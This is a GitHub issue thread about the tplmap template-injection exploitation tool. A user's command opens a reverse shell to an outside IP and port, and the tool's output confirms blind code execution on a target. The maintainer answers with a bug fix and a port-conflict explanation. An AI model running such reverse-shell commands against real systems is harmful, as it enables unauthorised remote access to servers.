epinna / tplmap

Server-Side Template Injection and Code Injection Detection and Exploitation Tool
GNU General Public License v3.0
3.81k stars 675 forks source link

correct use of reverse shell #17

Closed lacroutelacroute closed 7 years ago

lacroutelacroute commented 7 years ago

how to correct utilisation of reverse-shell

my error is sudo python ./tplmap.py -u '' -e velocity --level=5 --reverse-shell 82.246.225.33 8080 [+] Tplmap 0.3 Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'tag' is injectable [+] Velocity plugin is testing rendering with tag '#set($c=)\n${c}\n' [+] Velocity plugin is testing ) code context escape with 91 variations [+] Velocity plugin is testing #end#if(1==1) code context escape with 91 variations [+] Velocity plugin is testing blind injection [+] Velocity plugin is testing ) code context escape with 91 variations [+] Velocity plugin has confirmed blind injection [+] Tplmap identified the following injection point:

GET parameter: tag Engine: Velocity Injection: a})* Context: code OS: undetected Technique: blind Capabilities:

Shell command execution: yes (blind) Bind and reverse shell: yes File write: yes (blind) File read: no Code evaluation: no

[!][tplmap] Exiting: global name 'messages' is not defined Traceback (most recent call last): File "./tplmap.py", line 26, in main() File "./tplmap.py", line 19, in main checks.check_template_injection(Channel(args)) File "/opt/tplmap/tplmap/core/checks.py", line 299, in check_template_injection tcpserver = TcpServer(int(port), timeout) File "/opt/tplmap/tplmap/core/tcpserver.py", line 18, in init self.connect_socket() File "/opt/tplmap/tplmap/core/tcpserver.py", line 41, in connect_socket log.error(messages.module_backdoor_reversetcp.error_binding_socket_s % str(e)) NameError: global name 'messages' is not defined

I do not understand there are very few doc online

epinna commented 7 years ago

I fixed the bug, but you should still see the following error message:

[-][tcpserver] Port bind on IP:8080 has failed: [Errno 48] Address already in use

Because 8080 is already used. Close any netcat or service listening on that port and re-launch the command.